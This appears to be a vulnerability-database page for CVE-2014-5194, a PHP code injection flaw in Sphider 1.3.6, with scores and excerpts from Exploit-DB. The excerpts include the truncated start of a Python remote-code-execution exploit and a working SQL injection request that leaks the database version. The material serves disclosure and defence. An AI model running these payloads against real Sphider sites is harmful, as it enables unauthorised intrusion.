CVE-2014-5194
published 2014-08-07CVE-2014-5194: Static code injection vulnerability in admin/admin.php in Sphider 1.3.6 allows remote authenticated users to inject arbitrary PHP code into settings/conf.php…
PriorityP341medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
4.21%
89.7th percentile
Static code injection vulnerability in admin/admin.php in Sphider 1.3.6 allows remote authenticated users to inject arbitrary PHP code into settings/conf.php via the _word_upper_bound parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sphider | sphider | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
exploitdb·2020-10-27·CVSS 6.5
CVE-2014-5194 [MEDIUM] Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
---
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189
from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua
_F = "".join(random.choices(string.ascii_letters, k=13))
parser = ArgumentParser(description="Explo
Exploit-DB
Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
exploitdb·2014-07-28
CVE-2014-5194 Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
Sphider Search Engine 1.3.6 - Multiple Vulnerabilities
---
# Exploit Title: Sphider 1.3.6 or later SQL Injection
# Google Dork: intitle:"Sphider Admin Login"
# Date: 1 July 2014
# Exploit Author: Mike Manzotti
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v 1.3.6
Description:
The web application is vulnerable to SQLi. Once a website has been indexed with Sphider, an attacker can inject SQL under Sites -> Browser pages-> filter option.
Proof of Concept:
Response: POST: /admin/admin.php
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
Response:
5.5.35-0+wheezy1
[cid:[email protected]]
# Exploit Title: Sphider 1.3.6 or later PHP Injection
Description:
An authenticated user can inject P
No writeups or analysis indexed.
2014-08-07
Published